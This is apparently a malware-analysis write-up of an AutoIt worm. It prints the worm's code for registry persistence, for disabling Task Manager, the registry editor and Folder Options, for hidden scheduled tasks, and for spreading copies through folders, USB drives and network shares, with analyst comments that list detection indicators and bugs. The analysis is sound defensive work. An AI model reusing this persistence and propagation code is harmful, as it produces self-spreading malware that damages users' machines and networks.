AutoIt在线文档


https://www.autoitx.com/Doc/

注册表行为


设置开机自启

; Persistence: two autostart entries, both pointing at $name & $exe ($name and $exe are defined
; outside this excerpt, presumably the sample's file name and ".exe"; confirm against the full script).
; 1) Winlogon "Shell" is rewritten to "Explorer.exe <sample>", so the sample is started together with
;    the desktop shell. This is an HKLM write and needs sufficient privileges to succeed.
; 2) An HKCU Run value named "Yahoo Messengger" (note the double "g" — a useful triage/detection string)
;    launches the copy dropped in @SystemDir.
; Triage: a Winlogon Shell value other than plain "explorer.exe" is a strong indicator on its own.
RegWrite ("HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon","Shell","REG_SZ","Explorer.exe " & $name & $exe)
RegWrite ("HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run","Yahoo Messengger","REG_SZ",@SystemDir & "\" & $name & $exe)

禁用“设置”菜单中的“文件夹选项”

RegWrite ("HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer","NofolderOptions","REG_DWORD",1) 

禁用任务管理器

RegWrite ("HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System", "DisableTaskMgr", "REG_DWORD",1)

禁用注册表

RegWrite ("HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System", "DisableRegistryTools", "REG_DWORD",1)

设置计划任务永不停止

RegWrite ("HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Schedule","AtTaskMaxHours","REG_DWORD",0)

读取局域网共享文件设置

$a = RegRead ("HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\WorkgroupCrawler\Shares","shared")

计划任务行为


用到的函数

注:CMD以隐藏窗口模式执行命令

; Runs a command line through the command interpreter (@ComSpec /C ...) with a hidden window and
; blocks until it finishes. Returns RunWait's result (the child's exit code).
; Detection note: this produces a cmd.exe child of the AutoIt-compiled sample with "/C" in its
; command line and no visible window; both AT invocations below go through this helper.
Func _RunDOS($sCommand)
Return RunWait(@ComSpec & " /C " & $sCommand, "", @SW_HIDE)
EndFunc ;==>_RunDOS

取消所有已计划命令

_RunDOS ("AT /delete /yes")

定时运行样本

_RunDOS ("AT 09:00 /interactive /EVERY:m,t,w,th,f,s,su " & @SystemDir & "\" &$name & $exe) 

横向传播行为


用到的函数

; Recursive spreader: walks every entry under $current and, for each subdirectory, drops a copy of the
; sample (@WindowsDir\$name$exe) into that subdirectory named "<dirname>" & $exe, then recurses into it.
; Copy flag 0 = do not overwrite, so an existing file of that name is left alone.
; Artifact for responders: inside each traversed folder, a file whose base name equals the folder's own
; name (e.g. "Photos\Photos.exe") — a classic folder-mimicking disguise.
; Analyst note: the condition ($file <> "." Or $file <> "..") is always true (any string differs from at
; least one of the two), so the intended "." / ".." exclusion does not actually filter anything; whether
; that matters depends on whether FileFindNextFile returns those entries — confirm against the AutoIt
; docs for the version in use. No error check is done on FileFindFirstFile, so an unreadable $current
; just yields an immediate ExitLoop.
Func Search($current)
Local $search = FileFindFirstFile($current & "\*.*")
; Walk all entries in the directory; for each subdirectory, copy the sample into it as "<dirname>" & $exe
While 1
Dim $file = FileFindNextFile($search)
If @error Or StringLen($file) < 1 Then ExitLoop
If StringInStr(FileGetAttrib($current & "\" & $file), "D") And ($file <> "." Or $file <> "..") Then
; Intended: when the entry is a folder other than "." / "..", drop a copy named "<folder name>.exe" inside it (see note above — the exclusion is ineffective)
FileCopy (@WindowsDir & "\" & $name & $exe,$current & "\" & $file & "\" & $file & $exe,0)
Search($current & "\" & $file)
EndIf

Sleep (1)
WEnd
FileClose($search)
EndFunc

U盘横向传播

; Removable-media spreader. Enumerates removable drives, picks the first one (or the second if the
; first is "A:", i.e. presumably a floppy), copies the sample to its root as "New Folder.exe" without
; overwriting (flag 0), then hands the drive root to Search() so every folder on it also gets a copy.
; Artifacts: "<drive>:\New Folder.exe" in the root of removable media, plus the "<folder>\<folder>.exe"
; pattern left by Search(). Only one drive is ever used per call, and a drive is only skipped when it
; is literally "A:".
; Analyst note: $usb is dimensioned to 10 slots but the copy loop runs to $odia[0]; with more than nine
; removable drives the index would run past the array — presumably an uncaught runtime error in AutoIt.
Func copyusb()
Dim $usb[10]
$usb[0]=""
$usb[1]=""
$usb[2]=""
; Get the list of removable drives ($odia[0] holds the count)
$odia = DriveGetDrive("REMOVABLE")
If NOT @error Then
For $i=1 To $odia[0]
$usb[$i]=$odia[$i]
Next
; First removable drive, unless it is A:
If $usb[1] <>"A:" Then
If $usb [1] <>"" Then
FileCopy (@WindowsDir & "\" & $name & $exe,$usb[1] & "\New Folder.exe",0)
Search($usb[1])
EndIf
EndIf
; If the first one was A:, fall back to the second removable drive
If $usb[1]="A:" Then
If $usb[2]<>"" Then
FileCopy (@WindowsDir & "\" & $name & $exe,$usb[2] & "\New Folder.exe",0)
Search($usb[2])
EndIf
EndIf
EndIf
EndFunc

局域网横向传播

; Network-share spreader. Enumerates up to 30 subkeys under Explorer's WorkgroupCrawler\Shares key
; (presumably share paths the user has browsed — verify what this key holds on the target OS), turns
; each name into a UNC path ("\\" & name with "/" replaced by "\"), copies the sample there as
; "New Folder.exe" with overwrite enabled (flag 1), and on success recurses into the share with Search().
; Afterwards it records the last path it handled in the "shared" value of the same key, which the
; RegRead earlier in this write-up reads back.
; Artifacts: "New Folder.exe" in the root of reachable shares, the "<folder>\<folder>.exe" pattern on
; them, and the "shared" registry value. Network telemetry: SMB writes of "New Folder.exe" from the host.
; Analyst notes: the "shared" value uses $mang[$i-1]; if the loop ends on the first RegEnumKey error
; ($i = 1) that is the empty $mang[0], so the value becomes just "\New Folder.exe". If all 30 iterations
; complete, $i is past the loop bound and $mang[$i-1] indexes beyond Dim $mang[30] — presumably a
; runtime error. Only the RegEnumKey error is checked; FileCopy failures are silently skipped.
Func copynetwork ()
Dim $mang[30]
For $i=1 to 30
$read = RegEnumKey ("HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\WorkgroupCrawler\Shares",$i) ; enumerate subkeys
If @error Then ExitLoop
$read = StringReplace ($read,"/","\") ; replace "/" with "\"
$mang[$i] = "\\" & $read
$checkcopy = FileCopy (@WindowsDir & "\" & $name & $exe,$mang[$i] & "\New Folder.exe",1) ; copy RVHOST.exe to the share root as New Folder.exe, overwriting
; On success, continue spreading through that share's folders
If $checkcopy =1 Then
Search($mang[$i])
EndIf
Next
; Marker left in the registry: the last share path handled, plus "\New Folder.exe"
RegWrite ("HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\WorkgroupCrawler\Shares","shared","REG_SZ",$mang[$i-1] & "\New Folder.exe")
EndFunc